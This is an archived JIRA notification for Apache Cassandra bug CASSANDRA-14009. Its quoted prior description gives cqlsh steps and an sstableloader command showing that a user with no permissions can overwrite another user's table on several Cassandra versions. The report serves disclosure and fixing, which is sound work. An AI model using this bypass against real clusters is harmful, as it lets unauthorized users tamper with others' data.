Posted to commits@cassandra.apache.org by "Andrzej Bober (JIRA)" <ji...@apache.org> on 2017/11/13 14:07:00 UTC
[jira] [Updated] (CASSANDRA-14009) Any user can overwrite any table with sstableloader
[ https://issues.apache.org/jira/browse/CASSANDRA-14009?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Andrzej Bober updated CASSANDRA-14009:
--------------------------------------
Description: __deleted__ (was: Hi there,
Looks like any user can overwrite any table with sstableloader.
Tested on Ubuntu 16.04.3, Java 1.8.0_151_b12, and Cassandra 2.1.19 / 2.2.11 / 3.0.15 / 3.11.1.
{code:sql}
cassandra@cqlsh> CREATE USER alice WITH PASSWORD 'Alice';
cassandra@cqlsh> CREATE USER bob WITH PASSWORD 'Bob';
cassandra@cqlsh> CREATE KEYSPACE db4alice WITH replication = {'class': 'SimpleStrategy', 'replication_factor': 1};
cassandra@cqlsh> GRANT ALL PERMISSIONS ON KEYSPACE db4alice TO alice;
alice@cqlsh> CREATE TABLE users (userid text PRIMARY KEY, password text);
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user1', 'pass1');
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user2', 'pass2');
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user3', 'pass3');
alice@cqlsh> truncate users;
alice@cqlsh> select * from db4alice.users ;
userid | password
--------+----------
(0 rows)
sstableloader -d 127.0.0.1 -u bob -pw Bob ./db4alice/users
alice@cqlsh> select * from db4alice.users ;
userid | password
--------+----------
user2 | pass2
user1 | pass1
user3 | pass3
(3 rows)
{code}
Looks like a pretty serious bug to me.)
> Any user can overwrite any table with sstableloader
> ---------------------------------------------------
>
> Key: CASSANDRA-14009
> URL: https://issues.apache.org/jira/browse/CASSANDRA-14009
> Project: Cassandra
> Issue Type: Bug
> Components: Auth
> Reporter: Andrzej Bober
> Labels: security
> Fix For: 2.1.x, 2.2.x, 3.0.x, 3.11.x
>
>
> __deleted__
--
This message was sent by Atlassian JIRA
(v6.4.14#64029)